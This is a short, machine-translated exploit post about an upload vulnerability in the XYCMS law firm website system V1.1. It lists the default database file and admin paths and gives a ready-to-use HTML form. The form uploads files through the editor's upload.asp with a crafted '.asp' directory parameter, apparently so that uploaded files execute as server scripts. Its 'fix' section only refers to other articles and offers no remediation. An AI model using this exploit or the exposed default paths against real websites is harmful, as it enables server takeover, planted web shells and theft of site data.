XYCMS law firm website creation system V1.1 Upload Vulnerability and repair

By Mr. DzY from www.0855. TV

Source code introduction:

The website construction system of XYCMS law firm includes the Office profile, legal style, News Center, service field, typical cases, legal consultation, qualification certification, and contact us.

Background functions:
Enterprise information management: includes basic information management, addition, online registration information management, and Q & A Center Information Management
News Center Management: Manages news content, manages related categories, and adds or deletes news information.
Manage lawyers: manages, adds, and deletes law firms.

Source code download: http://www.bkjia.com/ym/201109/29273.html

Http://www.yuleroom.cn
Default DATA: http://www.bkjia.com/xydata/xycms. mdb
Default background: http://www.bkjia.com/system/index. asp

Exploit:

<Form action = "http://www.bkjia.com/system/xyeWebEditor/asp/upload. asp? Action = save & type = image & style = popup & cusdir = Mr. DzY. asp "method = post name = myform enctype =" multipart/form-data ">
<Input type = file name = uploadfile size = 100> <br>
<Input type = submit value = upload>
</Form>

 

Fix: For more information about upload vulnerabilities, see previous articles on this site.
PS: In analyticdb 1.0, Niu has released several problems: http://www.bkjia.com/article/201102/83752.html, so I won't have a problem.
This is not said, So add it. A little chicken, if there are similar, purely unexpected.